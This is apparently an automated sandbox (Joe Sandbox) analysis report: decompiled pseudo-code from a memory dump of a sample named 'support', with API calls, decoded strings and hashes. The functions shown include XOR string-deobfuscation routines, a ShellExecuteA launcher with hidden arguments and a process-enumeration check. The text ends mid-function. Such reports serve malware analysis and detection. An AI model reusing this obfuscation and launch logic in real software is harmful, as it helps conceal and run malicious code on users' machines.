					_t224 = _t224 + 1;
				} while (_t146 != 0);
				_push(_t224 - _t241);
				E003B51D0(_t198, _t224 - _t241,  &_v327);
				_t149 = E003BCA60(_t186,  &_v56,  &_v56, _t241);
				_t253 = _t252 + 0x18;
				if(_t149 != 0) {
					_t200 = 0;
					if(_v40 <= 0) {
						L24:
						memset( &_v284, 0, 0xb0);
						_t153 =  >=  ? _v80 :  &_v80;
						E003BDEF0(_t186,  &_v284, _t238, _t241,  >=  ? _v80 :  &_v80);
						 *((intOrPtr*)(_t245 +  *((intOrPtr*)(_v284 + 4)) - 0x110)) = 0x3c15b0;
						_t94 = _v284 + 4; // 0x0
						_t95 =  *_t94 - 0x68; // -104
						 *((intOrPtr*)(_t245 +  *_t94 - 0x114)) = _t95;
						_v16 = 9;
						_t227 =  >=  ? _v56 :  &_v56;
						E003B61D0( &_v284,  >=  ? _v56 :  &_v56, _v40);
						_t253 = _t253 + 4;
						_t160 = E003BE1A0( &_v280);
						if(_t160 == 0) {
							__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(2, _t160);
						}
						_v285 = 1;
						E003BD2B0( &_v284);
						L27:
						_t228 = _v36;
						if(_t228 >= 0x10) {
							_t212 = _v56;
							_t233 = _t228 + 1;
							_t170 = _t212;
							if(_t233 >= 0x1000) {
								_t212 =  *((intOrPtr*)(_t212 - 4));
								_t233 = _t233 + 0x23;
								if(_t170 > 0x1f) {
									__imp___invalid_parameter_noinfo_noreturn();
								}
							}
							_push(_t233);
							E003BE78C(_t170, _t212);
							_t253 = _t253 + 8;
						}
						_t229 = _v60;
						_v40 = 0;
						_v36 = 0xf;
						_v56 = 0;
						if(_t229 >= 0x10) {
							_t211 = _v80;
							_t232 = _t229 + 1;
							_t167 = _t211;
							if(_t232 >= 0x1000) {
								_t211 =  *((intOrPtr*)(_t211 - 4));
								_t232 = _t232 + 0x23;
								if(_t167 > 0x1f) {
									__imp___invalid_parameter_noinfo_noreturn();
								}
							}
							_push(_t232);
							E003BE78C(_t167, _t211);
							_t253 = _t253 + 8;
						}
						_t230 = _v84;
						_v64 = 0;
						_v60 = 0xf;
						_v80 = 0;
						if(_t230 >= 0x10) {
							_t210 = _v104;
							_t231 = _t230 + 1;
							_t164 = _t210;
							if(_t231 >= 0x1000) {
								_t210 =  *((intOrPtr*)(_t210 - 4));
								_t231 = _t231 + 0x23;
								if(_t164 > 0x1f) {
									__imp___invalid_parameter_noinfo_noreturn();
								}
							}
							_push(_t231);
							E003BE78C(_t164, _t210);
						}
						 *[fs:0x0] = _v24;
						return E003BE3D0(_v32 ^ _t245);
					}
					asm("o16 nop [eax+eax]");
					do {
						_t176 =  >=  ? _v56 :  &_v56;
						 *(( >=  ? _v56 :  &_v56) + _t200) =  *(( >=  ? _v56 :  &_v56) + _t200) ^ 0x0000005e;
						_t200 = _t200 + 1;
					} while (_t200 < _v40);
					goto L24;
				}
				_v285 = _t149;
				goto L27;
			}

0x003bcda1
0x003bcda9
0x003bcdb0
0x003bcdb4
0x003bcdb6
0x003bcdb8
0x003bcdc3
0x003bcdc4
0x003bcdc5
0x003bcdcb
0x003bcdd0
0x003bcdd2
0x003bcdd5
0x003bcdd6
0x003bcdd7
0x003bcddb
0x003bcde4
0x003bcde9
0x003bcdf4
0x003bcdfc
0x003bce05
0x003bce0e
0x003bce17
0x003bce1d
0x003bce27
0x003bce30
0x003bce3c
0x003bce48
0x003bce4e
0x003bce54
0x003bce5f
0x003bce66
0x003bce6b
0x003bce75
0x003bce7f
0x003bce82
0x003bce89
0x003bce8e
0x003bce96
0x003bce9d
0x003bcea4
0x003bceaa
0x003bceb5
0x003bceba
0x003bcec4
0x003bcece
0x003bced1
0x003bced8
0x003bcedd
0x003bcee5
0x003bceec
0x003bcef3
0x003bcefc
0x003bcf07
0x003bcf0c
0x003bcf13
0x003bcf1a
0x003bcf1d
0x003bcf21
0x003bcf26
0x003bcf2b
0x003bcf32
0x003bcf39
0x003bcf3c
0x003bcf40
0x003bcf49
0x003bcf4b
0x003bcf51
0x003bcf52
0x003bcf5a
0x003bcf5c
0x003bcf5f
0x003bcf6a
0x003bcf6c
0x003bcf6c
0x003bcf6a
0x003bcf72
0x003bcf74
0x003bcf79
0x003bcf79
0x003bcf7c
0x003bcf86
0x003bcf90
0x003bcf97
0x003bcf9b
0x003bcfa4
0x003bcfa6
0x003bcfac
0x003bcfad
0x003bcfb5
0x003bcfb7
0x003bcfba
0x003bcfc5
0x003bcfc7
0x003bcfc7
0x003bcfc5
0x003bcfcd
0x003bcfcf
0x003bcfd4
0x003bcfd4
0x003bcfd7
0x003bcfe1
0x003bcfeb
0x003bcff2
0x003bcff6
0x003bcfff
0x003bd001
0x003bd007
0x003bd008
0x003bd010
0x003bd012
0x003bd015
0x003bd020
0x003bd022
0x003bd022
0x003bd020
0x003bd028
0x003bd02a
0x003bd02f
0x003bd02f
0x003bd032
0x003bd039
0x003bd040
0x003bd044
0x003bd048
0x003bd04b
0x003bd052
0x003bd054
0x003bd05b
0x003bd065
0x003bd06f
0x003bd080
0x003bd086
0x003bd08d
0x003bd08e
0x003bd093
0x003bd096
0x003bd09d
0x003bd09f
0x003bd0a5
0x003bd0a8
0x003bd0af
0x003bd0b6
0x003bd0c0
0x003bd0c0
0x003bd0c2
0x003bd0c3
0x003bd0cf
0x003bd0d1
0x003bd0d8
0x003bd0dd
0x003bd0e2
0x003bd0ef
0x003bd0f4
0x003bd115
0x003bd123
0x003bd135
0x003bd13a
0x003bd148
0x003bd159
0x003bd15c
0x003bd15f
0x003bd166
0x003bd17a
0x003bd17e
0x003bd183
0x003bd18c
0x003bd193
0x003bd1a9
0x003bd1a9
0x003bd1b5
0x003bd1bc
0x003bd1c1
0x003bd1c1
0x003bd1c7
0x003bd1c9
0x003bd1cc
0x003bd1cd
0x003bd1d5
0x003bd1d7
0x003bd1da
0x003bd1e5
0x003bd1e7
0x003bd1e7
0x003bd1e5
0x003bd1ed
0x003bd1ef
0x003bd1f4
0x003bd1f4
0x003bd1f7
0x003bd1fa
0x003bd201
0x003bd208
0x003bd20f
0x003bd211
0x003bd214
0x003bd215
0x003bd21d
0x003bd21f
0x003bd222
0x003bd22d
0x003bd22f
0x003bd22f
0x003bd22d
0x003bd235
0x003bd237
0x003bd23c
0x003bd23c
0x003bd23f
0x003bd242
0x003bd249
0x003bd250
0x003bd257
0x003bd259
0x003bd25c
0x003bd25d
0x003bd265
0x003bd267
0x003bd26a
0x003bd275
0x003bd277
0x003bd277
0x003bd275
0x003bd27d
0x003bd27f
0x003bd284
0x003bd290
0x003bd2aa
0x003bd2aa
0x003bd0f6
0x003bd100
0x003bd107
0x003bd10b
0x003bd10f
0x003bd110
0x00000000
0x003bd100
0x003bd0e4
0x00000000

APIs

Part of subcall function 003BC980: rand.API-MS-WIN-CRT-UTILITY-L1-1-0(003C145D,00000000,4B5EE95B,76C86490), ref: 003BC9F1

Part of subcall function 003BC730: GetModuleFileNameA.KERNEL32(00000000,?,00000104,4B5EE95B,76C86490,73413D00), ref: 003BC77E
Part of subcall function 003BC730: memset.VCRUNTIME140(?,00000000,00000100,?,?), ref: 003BC7F2
Part of subcall function 003BC730: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 003BC883

Part of subcall function 003B4CF0: memmove.VCRUNTIME140(?,00000000,00000001,?,00000001,?,?,003B3666,?,0000001F,00000000,00000001), ref: 003B4D2C

Part of subcall function 003B4D60: memmove.VCRUNTIME140(00000000,00000000,?,?,00000001,?,?,003B3676,006F5B9C,?,0000001F,00000000,00000001), ref: 003B4D9F

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,4B5EE95B,76C86490,73413D00), ref: 003BCF6C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,4B5EE95B,76C86490,73413D00), ref: 003BCFC7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 003BD022
memset.VCRUNTIME140(?,00000000,000000B0,?,?,?,?,?,?,?,?,?), ref: 003BD123
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,000000B0,?,?,?,?,?,?,?,?,?), ref: 003BD1A9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000B0,?,?,?,?,?,?,?,?,?), ref: 003BD1E7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000B0,?,?,?,?,?,?,?,?,?), ref: 003BD22F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000B0,?,?,?,?,?,?,?,?,?), ref: 003BD277

Strings

aki|, xrefs: 003BD05B
[^K/, xrefs: 003BCDCB
agf&, xrefs: 003BD065
jaf, xrefs: 003BD06F

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmovememset$?setstate@?$basic_ios@D@std@@@std@@FileModuleNameU?$char_traits@rand
String ID: [^K/$agf&$aki|$jaf
API String ID: 3737502227-3009918244
Opcode ID: c82776146a2c8b25027a0afb0f2d600a3e4d9958852a69102243c31161a48df9
Instruction ID: 7c83c75cbb3663f39173059df67b93532cba649363758830fdeead165f0be752
Opcode Fuzzy Hash: c82776146a2c8b25027a0afb0f2d600a3e4d9958852a69102243c31161a48df9
Instruction Fuzzy Hash: B9E1F230D002888FDB1ADF68CC497EEBB71AF56308F1081D8D549AB692DB759B84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 003B6D60 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 174
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E003B6D60(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _v28;
				char _v44;
				intOrPtr _v48;
				void* _v52;
				char _v68;
				char _v71;
				short _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v83;
				signed char _v84;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v95;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v111;
				signed int _v112;
				char _v123;
				signed int _v124;
				signed int _t72;
				signed int _t73;
				char _t76;
				intOrPtr _t80;
				void* _t85;
				intOrPtr _t94;
				intOrPtr _t97;
				void* _t104;
				char* _t105;
				void* _t108;
				intOrPtr* _t109;
				signed char _t113;
				char _t120;
				char _t121;
				void* _t122;
				void* _t123;
				intOrPtr _t126;
				intOrPtr _t127;
				void* _t128;
				void* _t129;
				char* _t135;
				signed int _t137;
				void* _t138;
				void* _t139;

				_push(0xffffffff);
				_push(E003BF910);
				_push( *[fs:0x0]);
				_t139 = _t138 - 0x6c;
				_t72 =  *0x3c500c; // 0x4b5ee95b
				_t73 = _t72 ^ _t137;
				_v20 = _t73;
				_push(_t73);
				 *[fs:0x0] =  &_v16;
				asm("movaps xmm0, [0x3c1c50]");
				_t104 = 0;
				asm("movups [ebp-0x6c], xmm0");
				_v96 = 0;
				goto L1;
				do {
					L3:
					_t76 =  *_t105;
					_t105 = _t105 + 1;
				} while (_t76 != 0);
				_push(_t105 - _t122);
				E003B51D0( &_v68, _t122,  &_v111);
				_v8 = 0;
				_t108 = 0;
				asm("movaps xmm0, [0x3c1d20]");
				asm("movups [ebp-0x78], xmm0");
				_v108 = 0x59555942;
				_v104 = 0x58577e5a;
				_v100 = 0x44535a52;
				_v96 = 0x16;
				do {
					 *(_t137 + _t108 - 0x77) =  *(_t137 + _t108 - 0x77) ^ _v124;
					_t108 = _t108 + 1;
				} while (_t108 < 0x1c);
				_t109 =  &_v123;
				_v95 = 0;
				_v28 = 0;
				_t123 = _t109 + 1;
				_v24 = 0xf;
				_v44 = 0;
				do {
					_t80 =  *_t109;
					_t109 = _t109 + 1;
				} while (_t80 != 0);
				_push(_t109 - _t123);
				E003B51D0( &_v44, _t123,  &_v123);
				_v8 = 1;
				E003B4D60( &_v44,  &_v68);
				_t113 = 0x1b;
				_t135 =  >=  ? _v44 :  &_v44;
				_t85 = 0;
				_v84 = 0x756e691b;
				_v80 = 0x2877777f;
				_v76 = 0x637e3529;
				_v72 = 0x7e;
				while(1) {
					 *(_t137 + _t85 - 0x4f) =  *(_t137 + _t85 - 0x4f) ^ _t113;
					_t85 = _t85 + 1;
					if(_t85 >= 0xc) {
						break;
					}
					_t113 = _v84;
				}
				_v87 = 0;
				_v92 = 0x4a;
				_v71 = 0;
				_v91 = 0x6f;
				_v87 = 0;
				_v90 = 0x70;
				_v89 = 0x65;
				_v88 = 0x4b;
				ShellExecuteA(0,  &_v91,  &_v83, _t135, 0, 1);
				_t126 = _v24;
				if(_t126 >= 0x10) {
					_t121 = _v44;
					_t129 = _t126 + 1;
					_t97 = _t121;
					if(_t129 >= 0x1000) {
						_t121 =  *((intOrPtr*)(_t121 - 4));
						_t129 = _t129 + 0x23;
						if(_t97 > 0x1f) {
							__imp___invalid_parameter_noinfo_noreturn();
						}
					}
					_push(_t129);
					E003BE78C(_t97, _t121);
					_t139 = _t139 + 8;
				}
				_t127 = _v48;
				_v28 = 0;
				_v24 = 0xf;
				_v44 = 0;
				if(_t127 >= 0x10) {
					_t120 = _v68;
					_t128 = _t127 + 1;
					_t94 = _t120;
					if(_t128 >= 0x1000) {
						_t120 =  *((intOrPtr*)(_t120 - 4));
						_t128 = _t128 + 0x23;
						if(_t94 > 0x1f) {
							__imp___invalid_parameter_noinfo_noreturn();
						}
					}
					_push(_t128);
					E003BE78C(_t94, _t120);
				}
				 *[fs:0x0] = _v16;
				return E003BE3D0(_v20 ^ _t137);
				L1:
				 *(_t137 + _t104 - 0x6b) =  *(_t137 + _t104 - 0x6b) ^ _v112;
				_t104 = _t104 + 1;
				if(_t104 < 0xf) {
					goto L1;
				} else {
					_t105 =  &_v111;
					_v96 = 0;
					_v52 = 0;
					_t122 = _t105 + 1;
					_v48 = 0xf;
					_v68 = 0;
					goto L3;
				}
			}

0x003b6d63
0x003b6d65
0x003b6d70
0x003b6d71
0x003b6d74
0x003b6d79
0x003b6d7b
0x003b6d81
0x003b6d85
0x003b6d8b
0x003b6d92
0x003b6d94
0x003b6d98
0x003b6d98
0x003b6dd0
0x003b6dd0
0x003b6dd0
0x003b6dd2
0x003b6dd3
0x003b6ddc
0x003b6de1
0x003b6de6
0x003b6ded
0x003b6def
0x003b6df6
0x003b6dfa
0x003b6e01
0x003b6e08
0x003b6e0f
0x003b6e15
0x003b6e18
0x003b6e1c
0x003b6e1d
0x003b6e22
0x003b6e25
0x003b6e29
0x003b6e30
0x003b6e33
0x003b6e3a
0x003b6e40
0x003b6e40
0x003b6e42
0x003b6e43
0x003b6e4c
0x003b6e51
0x003b6e59
0x003b6e61
0x003b6e73
0x003b6e75
0x003b6e79
0x003b6e7b
0x003b6e82
0x003b6e89
0x003b6e90
0x003b6e96
0x003b6e96
0x003b6e9a
0x003b6e9e
0x00000000
0x00000000
0x003b6ea0
0x003b6ea0
0x003b6ea7
0x003b6eaf
0x003b6eb4
0x003b6ebc
0x003b6ec1
0x003b6ecb
0x003b6ed0
0x003b6ed7
0x003b6ee1
0x003b6ee3
0x003b6ee9
0x003b6eeb
0x003b6eee
0x003b6eef
0x003b6ef7
0x003b6ef9
0x003b6efc
0x003b6f07
0x003b6f09
0x003b6f09
0x003b6f07
0x003b6f0f
0x003b6f11
0x003b6f16
0x003b6f16
0x003b6f19
0x003b6f1c
0x003b6f23
0x003b6f2a
0x003b6f31
0x003b6f33
0x003b6f36
0x003b6f37
0x003b6f3f
0x003b6f41
0x003b6f44
0x003b6f4f
0x003b6f51
0x003b6f51
0x003b6f4f
0x003b6f57
0x003b6f59
0x003b6f5e
0x003b6f66
0x003b6f7e
0x003b6da0
0x003b6da3
0x003b6da7
0x003b6dab
0x00000000
0x003b6dad
0x003b6dad
0x003b6db0
0x003b6db4
0x003b6dbb
0x003b6dbe
0x003b6dc5
0x00000000
0x003b6dc5

APIs

ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000001), ref: 003B6EE1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003B6F09
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003B6F51

Strings

BYUY, xrefs: 003B6DFA
RZSD, xrefs: 003B6E08
[^K/, xrefs: 003B6D74
~, xrefs: 003B6E90
Z~WX, xrefs: 003B6E01
)5~c, xrefs: 003B6E89

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ExecuteShell
String ID: )5~c$BYUY$RZSD$Z~WX$[^K/$~
API String ID: 4120902618-3214826316
Opcode ID: 7ed1016f33d0ddf4de6a447d6b212dd33e783372fb76d2d408ee914fdc28abd6
Instruction ID: 90f33148e33a79ae78b9df6726555f1fadd09941cbce7a44ac0c047bd06928b3
Opcode Fuzzy Hash: 7ed1016f33d0ddf4de6a447d6b212dd33e783372fb76d2d408ee914fdc28abd6
Instruction Fuzzy Hash: 6F61F030804288CAEF06CFE8D845BEEFFB5EF5A308F24416DD441AB682DB745545CB60

Uniqueness

Uniqueness Score: -1.00%

Function 003B6C80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
processCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E003B6C80(void* __ebx, signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v272;
				void _v304;
				void* _v308;
				signed int _t11;
				signed int _t21;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t41;
				signed int _t42;

				_t11 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t11 ^ _t42;
				_t29 = __ecx;
				_t41 = CreateToolhelp32Snapshot(2, 0);
				if(_t41 == 0xffffffff) {
					L13:
					return E003BE3D0(_v8 ^ _t42);
				} else {
					_v308 = 0x128;
					memset( &_v304, 0, 0x124);
					if(Process32First(_t41,  &_v308) == 0) {
						L12:
						CloseHandle(_t41);
						goto L13;
					} else {
						do {
							_t21 = _t29;
							_t33 =  &_v272;
							while(1) {
								_t36 =  *_t33;
								if(_t36 !=  *_t21) {
									break;
								}
								if(_t36 == 0) {
									L8:
									_t22 = 0;
								} else {
									_t37 =  *((intOrPtr*)(_t33 + 1));
									if(_t37 !=  *((intOrPtr*)(_t21 + 1))) {
										break;
									} else {
										_t33 = _t33 + 2;
										_t21 = _t21 + 2;
										if(_t37 != 0) {
											continue;
										} else {
											goto L8;
										}
									}
								}
								L10:
								if(_t22 == 0) {
									CloseHandle(_t41);
									return E003BE3D0(_v8 ^ _t42);
								} else {
									goto L11;
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t22 = _t21 | 0x00000001;
							goto L10;
							L11:
						} while (Process32Next(_t41,  &_v308) != 0);
						goto L12;
					}
				}
				L15:
			}

0x003b6c89
0x003b6c90
0x003b6c9a
0x003b6ca2
0x003b6ca7
0x003b6d2e
0x003b6d40
0x003b6cad
0x003b6cb8
0x003b6cc5
0x003b6cdd
0x003b6d27
0x003b6d28
0x00000000
0x003b6cdf
0x003b6ce5
0x003b6ce5
0x003b6ce7
0x003b6cf0
0x003b6cf0
0x003b6cf4
0x00000000
0x00000000
0x003b6cf8
0x003b6d0c
0x003b6d0c
0x003b6cfa
0x003b6cfa
0x003b6d00
0x00000000
0x003b6d02
0x003b6d02
0x003b6d05
0x003b6d0a
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6d0a
0x003b6d00
0x003b6d15
0x003b6d17
0x003b6d42
0x003b6d5a
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6d17
0x003b6d10
0x003b6d12
0x00000000
0x003b6d19
0x003b6d23
0x00000000
0x003b6ce5
0x003b6cdd
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003B6C9C
memset.VCRUNTIME140(?,00000000,00000124), ref: 003B6CC5
Process32First.KERNEL32(00000000,00000128), ref: 003B6CD5
Process32Next.KERNEL32 ref: 003B6D21
CloseHandle.KERNEL32(00000000), ref: 003B6D28
CloseHandle.KERNEL32(00000000), ref: 003B6D42

Strings

[^K/, xrefs: 003B6C89

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32memset
String ID: [^K/
API String ID: 595100102-4166871755
Opcode ID: f0a7a7885cc2552f2f8b9e2aec4559699af1a31b58054450483ebbd90c02b0db
Instruction ID: b06fc7637bb93dfe6d556b96860b4538dbe3003adcd40c52ee54f708537049f4
Opcode Fuzzy Hash: f0a7a7885cc2552f2f8b9e2aec4559699af1a31b58054450483ebbd90c02b0db
Instruction Fuzzy Hash: 32214C357001185BC7229F34AC47BFA77A9EF0A304F0101A9EA06C7142D7369D09CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003B29D0 Relevance: 9.2, Strings: 7, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E003B29D0(void* __ebx, void* __edi) {
				char _v8;
				char _v16;
				signed int _v17;
				signed int _v18;
				intOrPtr _v24;
				signed int _v25;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v36;
				signed char _v37;
				signed char _v38;
				signed char _v39;
				signed char _v40;
				signed char _v41;
				signed char _v42;
				signed char _v43;
				signed int _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				signed char _v51;
				signed int _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				signed char _v59;
				signed int _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				signed char _v67;
				signed int _v68;
				char _v71;
				signed char _v72;
				signed char _v73;
				signed char _v74;
				signed char _v75;
				signed char _v76;
				signed char _v77;
				signed char _v78;
				signed char _v79;
				signed int _v80;
				char _v82;
				signed char _v83;
				signed char _v84;
				signed char _v85;
				signed char _v86;
				signed char _v87;
				signed char _v88;
				signed char _v89;
				signed char _v90;
				signed char _v91;
				signed int _v92;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v136;
				char _v164;
				char _v192;
				char _v220;
				char _v248;
				char _v276;
				char _v304;
				char _v332;
				char _v360;
				void* __ebp;
				signed int _t179;
				intOrPtr _t187;
				signed char _t193;
				signed char _t197;
				intOrPtr _t198;
				intOrPtr _t206;
				signed char _t217;
				intOrPtr _t218;
				intOrPtr _t227;
				intOrPtr _t236;
				intOrPtr _t244;
				intOrPtr _t250;
				signed char _t263;
				intOrPtr _t264;
				void* _t273;
				intOrPtr* _t279;
				signed char _t286;
				intOrPtr* _t287;
				intOrPtr* _t295;
				signed char _t302;
				signed char _t303;
				intOrPtr* _t304;
				intOrPtr* _t312;
				intOrPtr* _t320;
				intOrPtr* _t327;
				intOrPtr* _t333;
				signed char _t340;
				signed char _t341;
				intOrPtr* _t342;
				char* _t352;
				signed char _t355;
				char* _t357;
				char* _t361;
				signed char _t365;
				char* _t366;
				char* _t371;
				char* _t376;
				char* _t379;
				char* _t381;
				signed char _t385;
				char* _t386;
				void* _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				signed int _t399;
				void* _t400;
				char* _t402;
				char* _t403;
				char* _t404;
				char* _t405;
				char* _t406;
				char* _t407;
				char* _t408;
				char* _t409;

				_push(0xffffffff);
				_push(E003BF67E);
				_push( *[fs:0x0]);
				_t179 =  *0x3c500c; // 0x4b5ee95b
				_push(_t179 ^ _t399);
				 *[fs:0x0] =  &_v16;
				_v52 = 0x14;
				_v45 = 0;
				_v51 = 0x0000007d ^ _v52;
				_v45 = 0;
				_v49 = 0xd;
				_v50 = 0x7f;
				_v46 = 0x75;
				_t402 = _t400 - 0x140;
				_v47 = 0x7f;
				_t352 = _t402;
				_v48 = 0;
				_t279 =  &_v51;
				_t389 = _t279 + 1;
				 *((intOrPtr*)(_t352 + 0x10)) = 0;
				 *((intOrPtr*)(_t352 + 0x14)) = 0xf;
				 *_t352 = 0;
				do {
					_t187 =  *_t279;
					_t279 = _t279 + 1;
				} while (_t187 != 0);
				_push(_t279 - _t389);
				E003B51D0(_t352, _t352,  &_v51);
				_push(0xb12a9ae8);
				E003B3130( &_v360, _t352);
				_v8 = 0;
				_v44 = 0x20;
				_v43 = 0x0000004c ^ _v44;
				_t193 = _v44;
				_v17 = 0x4b;
				_t355 = 0x00000053 ^ _t193;
				_v36 = 0;
				_t286 = 0x00000041 ^ _t193 ^ _t193;
				_v41 = _t355;
				_v42 = _t286;
				_v38 = _t355 ^ _t193;
				_v39 = _t286;
				_t287 =  &_v43;
				_t197 = _v17 ^ _v44;
				_t390 = _t287 + 1;
				_t403 = _t402 - 0x18;
				_v40 = _t197;
				_t357 = _t403;
				_v37 = _t197;
				_v36 = 0;
				 *((intOrPtr*)(_t357 + 0x10)) = 0;
				 *((intOrPtr*)(_t357 + 0x14)) = 0xf;
				 *_t357 = 0;
				do {
					_t198 =  *_t287;
					_t287 = _t287 + 1;
				} while (_t198 != 0);
				_push(_t287 - _t390);
				E003B51D0(_t357, _t357,  &_v43);
				_push(0xf5baea1a);
				E003B3130( &_v332, _t357);
				_v8 = 1;
				_v108 = 0x42;
				_v102 = 0;
				_v102 = 0;
				_v106 = 0x2c;
				_v103 = 0x2c;
				_t295 =  &_v107;
				_v107 = 0x69;
				_v105 = 0x6d;
				_t404 = _t403 - 0x18;
				_v104 = 4;
				_t361 = _t404;
				_t391 = _t295 + 1;
				 *((intOrPtr*)(_t361 + 0x10)) = 0;
				 *((intOrPtr*)(_t361 + 0x14)) = 0xf;
				 *_t361 = 0;
				do {
					_t206 =  *_t295;
					_t295 = _t295 + 1;
				} while (_t206 != 0);
				_push(_t295 - _t391);
				E003B51D0(_t361, _t361,  &_v107);
				_push(0x7ca0c2be);
				E003B3130( &_v304, _t361);
				_v8 = 2;
				_v80 = 0xf;
				_v17 = 0x7a;
				_v79 = 0x00000056 ^ _v80;
				_v78 = 0x00000062 ^ _v80;
				_t302 = _v80;
				_v18 = 0x6e;
				_v73 = _v17 ^ _t302;
				_t365 = 0x00000060 ^ _t302 ^ _t302;
				_v77 = _t365;
				_t303 = _t302 ^ _t302;
				_v74 = _t365;
				_t217 = _v18 ^ _t302 ^ _t303;
				_v71 = 0;
				_t405 = _t404 - 0x18;
				_v75 = _t303;
